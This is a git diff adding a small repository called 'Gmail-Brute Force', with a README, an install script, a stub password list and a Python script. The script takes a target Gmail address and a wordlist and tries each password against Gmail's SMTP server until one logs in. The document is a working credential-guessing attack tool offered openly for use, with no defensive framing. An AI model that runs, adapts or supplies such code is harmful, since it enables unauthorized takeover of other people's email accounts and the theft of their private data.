diff --git a/README.md b/README.md
new file mode 100644
index 0000000..afdc0e8
--- /dev/null
+++ b/README.md
@@ -0,0 +1,32 @@
+# Gmail-Brute Force
+
+
+This Programm Write by [Mr.nope](https://github.com/mrprogrammer2938)
+
+
+```
+.----..----..-. .-. .--. .-..-. .----. .---. .-. .-..-----..----. .----. .---. .---. .----..----.
+| |--'} |__}} \/ { / {} \ { |} | ___ | {_} }} }}_}| } { |`-' '-'} |__} } |__}/ {-. \} }}_}| }`-'} |__}
+| }-`}} '__}| { } |/ /\ \| }} '--.{___}| {_} }| } \ \ `-' / } { } '__} } '_} \ '-} /| } \ | },-.} '__}
+`----'`----'`-' `-'`-' `-'`-'`----' `----' `-'-' `---' `-' `----' `--' `---' `-'-' `----'`----'
+```
+
+
+
+**Installing**
+```
+git clone https://github.com/mrprogrammer2938/Gmail-BruteForce
+
+cd Gmail-BruteForce
+
+bash install.sh
+
+python3 crack.py
+```
+
+
+### [Mr.nope](https://github.com/mrprogrammer2938) Account...
+
+[Instagram](https://instagram.com/mr.programmer2938)
+
+[Pinterest](https://www.pinterest.com/mrprogrammer2938)
diff --git a/crack.py b/crack.py
new file mode 100644
index 0000000..92f5734
--- /dev/null
+++ b/crack.py
@@ -0,0 +1,71 @@
+#!/usr/bin/python3
+# This Programm Write by Mr.nope
+# Gmail-Brute Force v1.4.3
+import os
+import time
+import sys
+import platform
+try:
+ import smtplib
+ from email.message import EmailMessage
+except ImportError:
+ os.system("pip3 install smtplib")
+ import smtplib
+ from email.message import EmailMessage
+try:
+ from colorama import Fore,init
+ init()
+except ImportError:
+ os.system("pip3 install colorama")
+system = platform.uname()[0]
+End = '\033[0m'
+Run_Err = "\nPlease, Run This Programm on Linux or MacOS!\n"
+banner = Fore.GREEN + """
+.----..----..-. .-. .--. .-..-. .----. .---. .-. .-..-----..----. .----. .---. .---. .----..----. """ + Fore.CYAN + " :)" + Fore.GREEN + """
+| |--'} |__}} \/ { / {} \ { |} | ___ | {_} }} }}_}| } { |`-' '-'} |__} } |__}/ {-. \} }}_}| }`-'} |__}
+| }-`}} '__}| { } |/ /\ \| }} '--.{___}| {_} }| } \ \ `-' / } { } '__} } '_} \ '-} /| } \ | },-.} '__}
+`----'`----'`-' `-'`-' `-'`-'`----' `----' `-'-' `---' `-' `----' `--' `---' `-'-' `----'`----'
+ """ + End
+def main():
+ os.system("printf '\033]2;Gmail-Brute Force\a'")
+ os.system("clear")
+ print(banner)
+ Addr = input("\nEnter Gmail Address: ")
+ time.sleep(0.35)
+ pass_file = input("\nEnter Passlist: ")
+ time.sleep(0.51)
+ passlist = open(pass_file,"r").read().split()
+ for Password in passlist:
+ try:
+ with smtplib.SMTP_SSL('smtp.gmail.com',465) as s:
+ s.login(Addr,Password)
+ print(f"Password: {Password} Found!")
+ except smtplib.SMTPAuthenticationError:
+ print(f"{Password} Not Found!")
+ time.sleep(1)
+ try1()
+def try1():
+ try_to_exit = input("\npress Enter...")
+ if try_to_exit == '':
+ ext()
+ else:
+ ext()
+def ext():
+ print(Fore.GREEN + "Exiting..." + End)
+ sys.exit()
+if __name__ == '__main__':
+ try:
+ try:
+ if system == 'Linux':
+ main()
+ else:
+ print(Run_Err)
+ sys.exit()
+ except KeyboardInterrupt:
+ print("\nCtrl + C")
+ print("\nExiting...")
+ sys.exit()
+ except EOFError:
+ print("\nCtrl + D")
+ print("\nExiting...")
+ sys.exit()
\ No newline at end of file
diff --git a/install.sh b/install.sh
new file mode 100644
index 0000000..8dfe11c
--- /dev/null
+++ b/install.sh
@@ -0,0 +1,28 @@
+#!/usr/bin/env bash
+# This Programm Write by Mr.nope
+# Gmail-Brute Force v1.4.3
+if [[ "$(id -u)" -ne 0 ]]; then
+ echo "
+Please, Run This Programm as Root!"
+ exit 1
+fi
+function main() {
+ printf '\033]2;Gmail-Brute Force\a'
+ clear
+ echo "
+Installing..."
+ chmod +x crack.py
+ sleep 2
+ apt install python
+ apt install python3
+ apt install python3-pip
+ pip3 install --upgrade pip
+ echo "
+Finish ;)
+
+Usage:
+ python3 crack.py
+ "
+ exit 1
+}
+main
\ No newline at end of file
diff --git a/passlist.txt b/passlist.txt
new file mode 100644
index 0000000..429f375
--- /dev/null
+++ b/passlist.txt
@@ -0,0 +1,5 @@
+12345
+54321
+abc
+
+... Please, enter passlist ;)
\ No newline at end of file